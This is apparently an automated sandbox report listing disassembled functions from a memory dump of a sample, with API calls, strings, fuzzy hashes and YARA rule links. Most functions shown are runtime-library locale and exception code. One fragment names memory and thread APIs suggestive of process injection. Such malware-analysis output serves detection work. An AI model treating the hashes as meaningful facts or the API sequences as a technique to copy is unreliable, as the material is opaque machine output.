API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 274678620fc8687a221d36ee8b0e6d719e06d6699a7331da0ec0757594d6c49c
Instruction ID: a2f0d938e716c826989c17ac34d364d882610738d3ca33c051935c4b5e0006bb
Opcode Fuzzy Hash: 274678620fc8687a221d36ee8b0e6d719e06d6699a7331da0ec0757594d6c49c
Instruction Fuzzy Hash: FF416E74644341BFE7209F60DC06F9A7BE8FF88B01F004519B788E62D0DBB0A954CBA6

Function 00CF1F76 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

GetACP.KERNEL32(?,?,?,?,?,?,00CE5027,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CF2037
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00CE5027,?,?,?,00000055,?,-00000050,?,?), ref: 00CF2062
_wcschr.LIBVCRUNTIME ref: 00CF20F6
_wcschr.LIBVCRUNTIME ref: 00CF2104
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00CF21C5

Strings

utf8, xrefs: 00CF2134

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 90ca814f9054d6d4805b0190bf4aa8f35f08587af3fb6a40331f1d7e7a9e1966
Instruction ID: 489f295cb7790afdb1ee396b1453b7afd01e296c2864b3e037af4583da94704f
Opcode Fuzzy Hash: 90ca814f9054d6d4805b0190bf4aa8f35f08587af3fb6a40331f1d7e7a9e1966
Instruction Fuzzy Hash: FC71293260070EAAD764AB75CC42BBB77A8EF44740F14406AFB19D7281EB70DE41D766

Function 00CF4197 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CF4353

Strings

1#INF, xrefs: 00CF564E
1#IND, xrefs: 00CF5630
1#QNAN, xrefs: 00CF5644
1#SNAN, xrefs: 00CF563A

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: dedd4ccc91dab65a3ea45bc87177d826b30bed9a4a41812d9bc23a3869fb5943
Instruction ID: d5f2fdedcb911d48da0b36b8e9cd4839d72c930ab81c4f87b318e218c52046a1
Opcode Fuzzy Hash: dedd4ccc91dab65a3ea45bc87177d826b30bed9a4a41812d9bc23a3869fb5943
Instruction Fuzzy Hash: BBD23B71E0862C8FDBA8CE28DD407EAB7B5EB45305F1441EAD61DE7240E774AE858F42

Function 00CF2702 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00CF2A20,00000002,00000000,?,?,?,00CF2A20,?,00000000), ref: 00CF279B
GetLocaleInfoW.KERNEL32(?,20001004,00CF2A20,00000002,00000000,?,?,?,00CF2A20,?,00000000), ref: 00CF27C4
GetACP.KERNEL32(?,?,00CF2A20,?,00000000), ref: 00CF27D9

Strings

OCP, xrefs: 00CF2756
ACP, xrefs: 00CF2720

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: beacb9f909223cffbe11d05ce503a9fcac3c4661942c7a1dee1b8191da1cf1e7
Instruction ID: 91a7ee9356211325c43ed474132472c5fac656f09a3a35fe2f954499af75aa21
Opcode Fuzzy Hash: beacb9f909223cffbe11d05ce503a9fcac3c4661942c7a1dee1b8191da1cf1e7
Instruction Fuzzy Hash: C221F536A00109E6D7B4AF55C900BB773A6EB50B54B664426EB1AD7214E732DF80C752

Function 00CF28D7 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00CF29E3
IsValidCodePage.KERNEL32(00000000), ref: 00CF2A2C
IsValidLocale.KERNEL32(?,00000001), ref: 00CF2A3B
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CF2A83
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CF2AA2

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 66214dbbe4a78bc93357d6147555923611f3b7c3dff20315a33adbd24865003f
Instruction ID: 4bff4ad767451222ff8a91f278ea5a23f9aae27223cf4a113f8a9df9360bf441
Opcode Fuzzy Hash: 66214dbbe4a78bc93357d6147555923611f3b7c3dff20315a33adbd24865003f
Instruction Fuzzy Hash: 97517172A00209AFDF60DFA5DC45BBE77B8EF08700F144529EA54E7191EBB09B44DB62

Function 00CDA2F5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDA301
IsDebuggerPresent.KERNEL32 ref: 00CDA3CD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDA3ED
UnhandledExceptionFilter.KERNEL32(?), ref: 00CDA3F7

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 27d99017e78a67980598d814e9ac9a4320cf2bb8a0ba6fd8965295e31d8c61ce
Instruction ID: b794af23ad737e33ad8f27b3a0300b415ebdccc5bd43b8c973d815b3df0202bd
Opcode Fuzzy Hash: 27d99017e78a67980598d814e9ac9a4320cf2bb8a0ba6fd8965295e31d8c61ce
Instruction Fuzzy Hash: 07310575D013189BDB10DFA4D989BCDBBB8AF08304F1041AAE50DAB350EB709A859F55

Function 00CF2389 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF23DD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF2427
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF24ED

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 3f7edd8df0cbcb16ec9ef4a4d83c9e8d8f8854208ee9b1f584b4c2b6a97bfb88
Instruction ID: 9d36c252ab56aa58050723e47a33e33eabf40fe2e238ee83c701c04eadd30641
Opcode Fuzzy Hash: 3f7edd8df0cbcb16ec9ef4a4d83c9e8d8f8854208ee9b1f584b4c2b6a97bfb88
Instruction Fuzzy Hash: 8961927195020B9FDB68DF28CC92BBA77A9FF04300F14417AEE15CA285E774DA81DB61

Function 00CDECBD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CDEDB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CDEDBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CDEDCC

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d30f4e5d8851091de6e047c9ccb2883cc516459705a886b2d374b8b93f5c0950
Instruction ID: 9f1554cc31f310cb28b91c66ccf8e6d67a4a196a78582ff1b2214abaa96f120a
Opcode Fuzzy Hash: d30f4e5d8851091de6e047c9ccb2883cc516459705a886b2d374b8b93f5c0950
Instruction Fuzzy Hash: 0331B274901228ABCB21EF64DD8979DBBB8BF08710F5041EAE51CA6351EB749F818F54

Function 00CDDCB0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00CDDCAF,00000000,00000000,?,00000000,?,00CE7EC1), ref: 00CDDCD2
TerminateProcess.KERNEL32(00000000,?,00CDDCAF,00000000,00000000,?,00000000,?,00CE7EC1), ref: 00CDDCD9
ExitProcess.KERNEL32 ref: 00CDDCEB

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 043cd62f7c05a4d532eb99c7ec5d6f3b447c7c536434a277caa647e704748d87
Instruction ID: 7b928b5d5d07cafb2f1212483bd86fd5a0ff5d2b5cc73a0dfadba3944b9d3db3
Opcode Fuzzy Hash: 043cd62f7c05a4d532eb99c7ec5d6f3b447c7c536434a277caa647e704748d87
Instruction Fuzzy Hash: 52E0EC35421298AFCF126F68DD0AB4C3B6AFB81381F004415F90AC6331DB75DD91DB55

Function 00CE2D70 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
Instruction ID: bfb85aaeb15000afb4f75530c59b546ec3ca2aab2e1621b36fdca35591097f84
Opcode Fuzzy Hash: 0ac2c11185d8fc5ad81346666ec16ea2fa478ee6a3bab73839346bcea6eaf536
Instruction Fuzzy Hash: 62F12E71E002599FDF14CFA9C8846AEB7B5FF88314F15826DE929A7344D731AE41CB90

Function 00CEC82D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CEC828,?,?,00000008,?,?,00CF62F0,00000000), ref: 00CECA5A

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d71c9b34f5e2f9ed1c689feed3607d2674e28f78e1cba7d447be9c93da2b3fa4
Instruction ID: f4b846518b65d054fd3a2bf17b4f36369850ceb98a67b5fb0cb2866f64310d04
Opcode Fuzzy Hash: d71c9b34f5e2f9ed1c689feed3607d2674e28f78e1cba7d447be9c93da2b3fa4
Instruction Fuzzy Hash: CBB14E32610649DFD714CF29C4C6B657BA0FF45364F258658E8EACF2A1C335EA92CB40

Function 00CDA4DF Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDA4F5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d68b2a799040b740b9b34c20e5eb953d6a90058943018361a61f9faeb2508b31
Instruction ID: 39041765735f9ee55a8ee79461a6942c6a96c794891e392f1951360471c73907
Opcode Fuzzy Hash: d68b2a799040b740b9b34c20e5eb953d6a90058943018361a61f9faeb2508b31
Instruction Fuzzy Hash: FD519DB2A00705DFDB15CF55E8953AABBF0FB48310F24802AD521EB395E774DA41CBA1

Function 00CEF0C1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0e7907b6fc1f17ceecb70a10264084c4efc87338964174abbff4d05c5e63dc
Instruction ID: 1621851fcaebfed58f2217e991e6c44e11e79bd5b836cc5e104d7e8633d6d29f
Opcode Fuzzy Hash: 0c0e7907b6fc1f17ceecb70a10264084c4efc87338964174abbff4d05c5e63dc
Instruction Fuzzy Hash: 9641C2B580425DAEDB20EF69CC89AAEBBB8AF45300F1442EDE41DD3211DA309E858F50

Function 00CF25DC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CF2630

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 7fdb9eae46c6ba3b5a36b0518353a8bd4f55763bdc00aafb5f7d3176a1bb21ff
Instruction ID: 1ca29b9d0090b90d564c465d374cb2f920ec6ca350b1f3ba8660b4cb7f04b86f
Opcode Fuzzy Hash: 7fdb9eae46c6ba3b5a36b0518353a8bd4f55763bdc00aafb5f7d3176a1bb21ff
Instruction Fuzzy Hash: 4F21847261120AABDB68AF25DC41EBA77BCEF44310F10407AFE15DA241EB74ED40EB55

Function 00CF2263 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

EnumSystemLocalesW.KERNEL32(00CF2389,00000001,00000000,?,-00000050,?,00CF29B7,00000000,?,?,?,00000055,?), ref: 00CF22D5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 20b8d37faef24b7eea8091423e0ce497e271d5ce8222cd853a07cd89d4757b46
Instruction ID: d926c590a104636aa9a4f538b8ad0ae07f15b44d537f357d811ab395f0579200
Opcode Fuzzy Hash: 20b8d37faef24b7eea8091423e0ce497e271d5ce8222cd853a07cd89d4757b46
Instruction Fuzzy Hash: 00114C3B2007099FDB189F79D8916BAB791FF80368B14442DEA8687740D371B902D740

Function 00CF2808 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CF2686,00000000,00000000,?), ref: 00CF2834

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0168f42d677a3118c540a54940499929b52ee07c128fd946b385b6fcb5d956b5
Instruction ID: 2b1c002a24d5b5d893a0c64e928251c367b8115a2c1f6b178a9321603addf923
Opcode Fuzzy Hash: 0168f42d677a3118c540a54940499929b52ee07c128fd946b385b6fcb5d956b5
Instruction Fuzzy Hash: A6F0F933600219ABDB2856218806BBA7B68DF40794F140429EE66B31C0DA34FE41C5D1

Function 00CF2171 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00CF21C5

Strings

utf8, xrefs: 00CF2134

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: utf8
API String ID: 2003897158-905460609
